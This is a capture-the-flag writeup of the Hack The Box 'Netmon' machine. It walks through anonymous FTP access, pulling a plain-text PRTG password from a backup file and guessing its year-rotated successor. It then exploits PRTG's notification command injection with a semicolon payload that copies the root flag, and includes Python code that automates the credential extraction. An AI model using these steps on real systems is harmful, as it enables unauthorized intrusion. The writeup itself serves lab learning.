Hack the box - Netmon

Oct 22, 2019 07:24 · 499 words · 3 minute read tutorial writeup ctf

If you have never heard of Hack The Box before, I recommend checking my first writeup, on the Lame box.

Netmon Box

netmon_logo

Nmap

We start, as usual, with a port scan using nmap.

nmap1

nmap2

There is an FTP server and an HTTP server.

FTP

The FTP server accepts anonymous logins, so we can simply browse it with a web browser.

ftp

By browsing through the folders, we quickly find the user flag at:

ftp://10.10.10.152/Users/Public/user.txt

However, we cannot access the Users/Administrator folder.

HTTP server: PRTG

prtg

Default credentials

A quick search shows that the default credentials for PRTG are

prtgadmin
prtgadmin

But they do not work.

Find stored credentials

Since we have read access to the whole filesystem via FTP, we can search for stored credentials.

Here is a Reddit post that explains where PRTG stores account names and passwords in plain text by default:

PRTG exposes Domain accounts and passwords in plain text.

Let's browse to ftp://10.10.10.152/ProgramData/Paessler/PRTG%20Network%20Monitor/PRTG%20Configuration.old.bak

We open the file in a text editor, search for "user", and find a login inside a <dbpassword> element:

prtgadmin
PrTg@dmin2018

Well, that does not work either.

But think about what we downloaded: it's a backup from 2018, and we are in 2019. The password has probably been changed to PrTg@dmin2019. And yes, that is the case!
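The two manual steps above (searching the backup for clear-text passwords, then guessing the year-rotated variant) are easy to script. The following is an added example, not part of the original writeup and not PRTG's code. The XML sample is constructed to mimic the layout described above (a "User:" comment followed by the plain-text password inside <dbpassword>); the exact structure of the real backup file is an assumption, and entries flagged as encrypted are skipped because their body is not a usable password.

```python
"""Recover clear-text credentials from a PRTG configuration backup and
derive year-rotated password candidates.

Added example for this writeup; the sample below is constructed and the
<dbpassword> layout it assumes is a simplification of the real file.
"""
import re

# Constructed sample resembling the relevant part of
# "PRTG Configuration.old.bak" (assumed layout, not the real file).
SAMPLE_CONFIG = """\
<?xml version="1.0" encoding="UTF-8"?>
<prtg>
  <data>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <dbpassword>
      <flags><encrypted/></flags>
      AB1C2D3E4F
    </dbpassword>
  </data>
</prtg>
"""

# One <dbpassword> block: an optional "User:" comment, then the body.
_DBPASSWORD = re.compile(
    r"<dbpassword>\s*(?:<!--\s*User:\s*(?P<user>\S+)\s*-->)?"
    r"(?P<body>.*?)</dbpassword>",
    re.DOTALL,
)


def extract_credentials(config_text):
    """Return (user, password) pairs stored in clear text.

    Entries whose body carries <flags><encrypted/></flags> are skipped:
    what follows is ciphertext, not a password we can log in with.
    """
    found = []
    for m in _DBPASSWORD.finditer(config_text):
        body = m.group("body")
        if "<encrypted/>" in body:
            continue
        # Drop any remaining tags and surrounding whitespace.
        password = re.sub(r"<[^>]+>", "", body).strip()
        if password:
            found.append((m.group("user") or "<unknown>", password))
    return found


def year_rotated_candidates(password, upto_year):
    """If the password ends in a four-digit year, also try later years.

    Backups go stale, and an operator who appends the year to a password
    has probably bumped it since. Returns the original first, then one
    candidate per year up to and including `upto_year`.
    """
    m = re.search(r"(?:19|20)\d{2}$", password)
    if not m:
        return [password]
    stem, year = password[: m.start()], int(m.group(0))
    return [f"{stem}{y}" for y in range(year, max(year, upto_year) + 1)]


if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_CONFIG):
        print(f"{user}: {password}")
        for candidate in year_rotated_candidates(password, 2019):
            print(f"  try {candidate}")
```

On the real box you would feed the downloaded backup file to extract_credentials instead of SAMPLE_CONFIG; the candidate list is what you would try against the PRTG login page.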

Remote code execution

Searching for the PRTG version reported by nmap (Indy httpd 18.1.37.13946), we quickly find this blog post about remote code execution through the notification system:

PRTG < 18.2.39 Command Injection Vulnerability

Setup → Notifications → Select a notification (for example “Email and push notification to admin”)

Scroll down, there is an option to “Execute Program”.

In the Program File field, select "Demo EXE Notification - OutFile.ps1". This default script writes the current date to the file whose path is given as its parameter. It can be read from the FTP share:

ftp://10.10.10.152/Program%20Files%20(x86)/PRTG%20Network%20Monitor/Notifications/EXE/Demo%20EXE%20Notification%20-%20OutFile.ps1

The source code of the script:

# Demo 'Powershell' Notification for Paessler Network Monitor
# Writes current Date/Time into a File
#
# How to use it:
#
# Create an exe-notification on PRTG, select 'Demo Exe Notification - OutFile.ps1' as program.
# The Parameter section consists of one parameter:
#
# - Filename
#
# e.g.
#
#         "C:\temp\test.txt"
#
# Note that the directory specified must exist.
# Adapt Errorhandling to your needs.
# This script comes without warranty or support.

if ($Args.Count -eq 0) {
    # No arguments. Filename must be specified.
    exit 1;
} elseif ($Args.Count -eq 1) {
    # The parent directory of the requested file must already exist.
    $Path = Split-Path $Args[0];

    if (Test-Path $Path) {
        $Text = Get-Date;
        $Text | Out-File $Args[0];
        exit 0;
    } else {
        # Directory does not exist.
        exit 2;
    }
}

So we give the script a parameter: C:\Users\Public\date.txt

Save it. Select the notification and click on the bell icon to send a test notification.

The script is executed with the provided parameter and creates the file ftp://10.10.10.152/Users/Public/date.txt containing the date, for example "Wednesday, May 22, 2019 7:44:56 AM".

Now we run a more interesting command. The parameter is not handed to the script as a single quoted argument; it ends up on a PowerShell command line, so a semicolon terminates the script's statement and whatever follows runs as a separate command:

C:\Users\Public\date.txt; Copy-Item -Path C:\Users\Administrator\Desktop\root.txt -Destination C:\Users\Public\root.txt -Recurse

This copies the root flag to a folder that is readable over anonymous FTP.

Via FTP, we browse to Users\Public\root.txt and retrieve the flag.
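To make the mechanism behind the payload above concrete, here is an added example (not PRTG's code and not from the original writeup). The two builders are stand-ins for how an application might hand a user-supplied notification parameter to PowerShell: one pastes it into the command text, which is the pattern that lets a semicolon start a second statement; the other wraps it in a single-quoted PowerShell literal so it can only ever be one argument. The script path is taken from the page, the payload is the one shown above, and the statement splitter is a deliberately minimal tokenizer written for this demonstration.

```python
"""Why a ';' in the notification parameter runs a second command.

Added example for this writeup. build_vulnerable/build_hardened are
illustrative stand-ins for an application's command assembly, not PRTG's
actual implementation; split_statements is a constructed, minimal model
of how PowerShell separates statements.
"""

# Script path as it appears on the page.
SCRIPT = (r"C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE"
          r"\Demo EXE Notification - OutFile.ps1")

# Parameter used on the page: a harmless file path, then an injected statement.
PAYLOAD = (r"C:\Users\Public\date.txt; "
           r"Copy-Item -Path C:\Users\Administrator\Desktop\root.txt "
           r"-Destination C:\Users\Public\root.txt -Recurse")


def build_vulnerable(param):
    """Concatenate the parameter into PowerShell source text.

    PowerShell's parser, not the application, now decides where the
    statement ends, so ';' in `param` starts a new statement.
    """
    return f"& '{SCRIPT}' {param}"


def ps_quote(value):
    """Render a string as one PowerShell single-quoted literal.

    Inside single quotes the only special character is the quote itself,
    which is escaped by doubling it; everything else, ';' included, is data.
    """
    return "'" + value.replace("'", "''") + "'"


def build_hardened(param):
    """Pass the parameter as exactly one quoted argument."""
    return f"& '{SCRIPT}' {ps_quote(param)}"


def split_statements(command):
    """Split a command line on ';' characters that sit outside quotes.

    Constructed model for the demonstration: handles single and double
    quotes only (no here-strings, no backtick escapes).
    """
    statements, current, quote = [], [], None
    for ch in command:
        if quote:
            current.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            current.append(ch)
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    tail = "".join(current).strip()
    if tail:
        statements.append(tail)
    return statements


if __name__ == "__main__":
    for label, builder in (("vulnerable", build_vulnerable),
                           ("hardened", build_hardened)):
        stmts = split_statements(builder(PAYLOAD))
        print(f"{label}: {len(stmts)} statement(s)")
        for s in stmts:
            print("   ", s)
```

With the concatenating builder the payload yields two statements, the second being the Copy-Item that exfiltrates root.txt; with the quoting builder the whole parameter stays a single argument to the script, which is what the fixed PRTG release named in the linked advisory (18.2.39) has to guarantee.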
